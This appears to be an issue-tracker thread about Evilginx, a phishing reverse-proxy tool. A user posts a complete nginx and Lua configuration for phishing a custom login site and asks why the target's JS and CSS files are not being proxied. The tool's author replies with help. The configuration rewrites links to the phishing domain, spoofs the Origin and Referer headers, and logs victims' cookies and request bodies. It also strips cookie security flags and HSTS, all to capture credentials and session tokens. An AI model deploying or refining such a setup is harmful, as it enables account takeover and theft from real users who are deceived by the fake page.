js and css files showing as html

[dissidentmoore]

First I'll say, great job on this, everything worked out of the box with basically no snags, very cool.
However I'm have a lot of trouble getting things working for a custom target. The target page is getting served when I visit the phishing domain like it should, but any CSS or JS files are not, for some reason the same login page is being served for each js or css file. Here are my config and site.conf file

config

[site]
name=site
site_conf=["site.com.conf"]
creds_conf=site.creds
phish_subdomains=["www1"]
phish_paths=["/blah/blah/login"]
target_hosts=["www1.site.com/cgi-bin/dir/script?PF=IT&REQ=ClientSignin&LANGUAGE=ENGLISH"]
cookie_hosts=["site.com"]
redir_arg=rc
success_arg=rd
log_name=evilginx-site.log
cert_subdomains=["www1"]

site.conf

log_format site_phish '{"remote_addr":"$remote_addr","time":"$time_local","host":"$http_host","request":"$request","status":"$status","referer":"$http_referer","ua":"$http_user_agent","conn":"$connection","cookies":"$http_cookie","set-cookies":"$set_cookies_all","body":"$request_body"}';

server {
    listen 80;
    listen 443 ssl;

    server_name {{PHISH_HOSTNAME[0]}};

    ssl_certificate {{CERT_PUBLIC_PATH}};
    ssl_certificate_key {{CERT_PRIVATE_PATH}};

    ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
    ssl_prefer_server_ciphers on;
    ssl_ciphers 'EECDH+AESGCM:EDH+AESGCM:AES256+EECDH:AES256+EDH';

    if ($scheme = http) {
        return 301 https://$server_name$request_uri;
    }

    location / {
        proxy_pass https://{{TARGET_HOST[0]}};
        proxy_cookie_domain {{COOKIE_HOST[0]}} {{PHISH_DOMAIN}};
        proxy_cookie_domain .www1.{{COOKIE_HOST[0]}} .www1.{{PHISH_DOMAIN}};
        proxy_redirect https://{{TARGET_HOST[0]}}/ https://{{PHISH_HOSTNAME[0]}}/;

        sub_filter 'action="https://{{TARGET_HOST[0]}}' 'action="https://{{PHISH_HOSTNAME[0]}}';
        sub_filter 'href="https://{{TARGET_HOST[0]}}' 'href="https://{{PHISH_HOSTNAME[0]}}';
        sub_filter '//{{TARGET_HOST[0]}}' '//{{PHISH_HOSTNAME[0]}}';
        sub_filter_once off;

        set $auth_token "tokenid";

        proxy_set_header Accept-Encoding "";
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;

        set_unescape_uri $redir $arg_{{REDIR_ARG}};
        set $set_cookies_all "";

        access_log /var/log/{{LOG_NAME}} site_phish;

        access_by_lua_block {
            if ngx.var.http_origin ~= nil then
                val = string.gsub(ngx.var.http_origin, '{{PHISH_HOSTNAME_ESC[0]}}', '{{TARGET_HOST[0]}}')
                ngx.req.set_header("Origin", val)
            end

            if ngx.var.http_referer ~= nil then
                val = string.gsub(ngx.var.http_referer, '{{PHISH_HOSTNAME_ESC[0]}}', '{{TARGET_HOST[0]}}')
                ngx.req.set_header("Referer", val)
            end

            if ngx.var.http_cookie ~= nil then
                local c_rc = string.match(ngx.var.http_cookie, "{{REDIR_ARG}}=([^;]*)")
                local c_rd = string.match(ngx.var.http_cookie, "{{SUCCESS_ARG}}=([^;]*)")

                if c_rc ~= nil and c_rd ~= nil then
                    ngx.redirect(c_rc)
                end
            end
        }

        header_filter_by_lua_block {
            function get_cookies()
                local cookies = ngx.header.set_cookie or {}
                if type(cookies) == "string" then
                    cookies = {cookies}
                end
                return cookies
            end

            function add_cookie(cookie)
                local cookies = get_cookies()
                table.insert(cookies, cookie)
                ngx.header.set_cookie = cookies
            end

            function exists_cookie(cookie)
                local cookies = get_cookies()
                for i, val in ipairs(cookies) do
                    if string.match(val, "^" .. cookie .. "=") ~= nil then
                        return true
                    end
                end
                return false
            end

            ngx.header["Strict-Transport-Security"] = {}
            if ngx.var.http_origin ~= nil then
                ngx.header["Access-Control-Allow-Origin"] = ngx.var.http_origin
            end

            if ngx.var.redir ~= "" then
                local r_url = ngx.var.redir
                if string.sub(r_url,1,1) == '0' then
                    val = string.sub(ngx.var.redir, 2)
                    r_url = ngx.decode_base64(val)
                end
                add_cookie("{{REDIR_ARG}}=" .. ngx.escape_uri(r_url) .. "; path=/")
            end

            if ngx.header.location then
            end

            if ngx.var.http_cookie ~= nil then
                local c_rc = string.match(ngx.var.http_cookie, "{{REDIR_ARG}}=([^;]*)")
                local c_rd = string.match(ngx.var.http_cookie, "{{SUCCESS_ARG}}=([^;]*)")

                if c_rc ~= nil then
                    if exists_cookie(ngx.var.auth_token) or c_rd ~= nil then
                        ngx.header.location = ngx.unescape_uri(c_rc)
                        add_cookie("{{SUCCESS_ARG}}=true; path=/")
                    end
                end
            end

            if ngx.header.set_cookie then
                local cookies = ngx.header.set_cookie
                if not cookies then return end
                if type(cookies) ~= "table" then cookies = {cookies} end
                local newcookies = {}
                local allcookies = ""
                for i, val in ipairs(cookies) do
                    val = string.gsub(val, '; *[mM]ax%-[aA]ge=[^;]*', "")
                    val = string.gsub(val, '; *[eE]xpires=[^;]*', "")
                    val = string.gsub(val, '; *[sS]ecure', "")
                    table.insert(newcookies, val)
                    if i>1 then allcookies = allcookies .. "||" end
                    allcookies = allcookies .. val
                end
                ngx.header.set_cookie = newcookies
                ngx.var.set_cookies_all = allcookies
            end
        }
    }
}

Also(this is unrelated): in the .conf files for each site, you have sub_filter_types text/html application/json;set unnecessarily, text/html is already set by default. This causes [warn] duplicate MIME type "text/html" in /etc/nginx/sites-enabled/site.com.conf warning everytime the page is requested, everything still works but the error.log gets full pretty quick.

[dissidentmoore]

Hmm, so i think my problem is that the target host has a request uri. Everything seems to work fine if the request uri is omitted. Is there any way to include the request uri, but only for the login page, and not for additional resources like js/css and images?

[kgretzky]

Hello! target_hosts must contain hostnames only. I'm not sure exactly how your site works, but if you properly proxy your site with Evilginx, you should be able to specify anything you want in URL path, using your fake domain.

And thanks for letting me know why these warnings are generated! I will fix it ASAP.